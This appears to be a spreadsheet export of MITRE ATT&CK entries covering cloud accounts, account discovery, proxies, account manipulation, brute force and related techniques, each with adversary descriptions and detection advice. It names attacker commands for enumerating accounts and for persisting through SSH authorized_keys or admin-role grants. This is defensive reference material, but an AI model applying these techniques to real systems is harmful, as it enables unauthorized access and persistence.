    <t>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</t>
  </si>
  <si>
    <t xml:space="preserve">
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t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</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</si>
  <si>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In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</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</si>
  <si>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A breakdown of system data can also be gathered through the macOS &lt;code&gt;systemsetup&lt;/code&gt; command, but it requires administrative privileges.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t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>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</si>
  <si>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 (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups.</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>Office 365 account logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Office 365</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Cloud Account</t>
  </si>
  <si>
    <t>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Office 365,Azure AD,SaaS</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or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Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Network protocol analysis,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows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</si>
  <si>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Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external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</si>
  <si>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Adversaries may use an external proxy to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to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.</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</si>
  <si>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 A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Packet capture</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting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</si>
  <si>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Replication Through Removable Media</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>lateral-movement,initial-access</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</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</si>
  <si>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</si>
  <si>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Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Windows,Linux,macOS,Network</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)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 
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Adversaries may use a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 (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Windows,Office 365,Azure,GCP,Azure AD,AWS,Linux,macOS</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs</t>
  </si>
  <si>
    <t>Azure AD,Azure,AWS,GCP</t>
  </si>
  <si>
    <t>Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals)
After gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>Office 365 audit logs</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>Office 365</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</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</si>
  <si>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Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.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</si>
  <si>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T1102.001</t>
  </si>
  <si>
    <t>Dead Drop Resolver</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</si>
  <si>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User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to host information that points to additional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a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.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t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>One-Way Communication</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</si>
  <si>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Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.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</si>
  <si>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Multi-Stage Channels</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.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</si>
  <si>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Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>System calls,Loaded DLLs,API monitoring,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and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 
Utilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. </t>
  </si>
  <si>
    <t>Adversaries may directly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Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries.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abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,Office 365,SaaS,Azure AD</t>
  </si>
  <si>
    <t>Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.
Detection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.
If an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.
For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**
Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. 
If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.
Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.</t>
  </si>
  <si>
    <t>defense-evasion,persistence</t>
  </si>
  <si>
    <t>Network intrusion detection system,Anti-virus</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Office 365 account logs,Authentication logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD,SaaS,GCP,AWS,Azure</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>Authentication logs,Office 365 account logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,GCP,Azure AD,AWS,Azure,SaaS</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>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Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords.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t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying.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t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.
Typically, management services over commonly used ports are used when stuffing credentials.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t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Kernel drivers</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for two-factor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2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017)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
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).</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</si>
  <si>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t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,File monitoring</t>
  </si>
  <si>
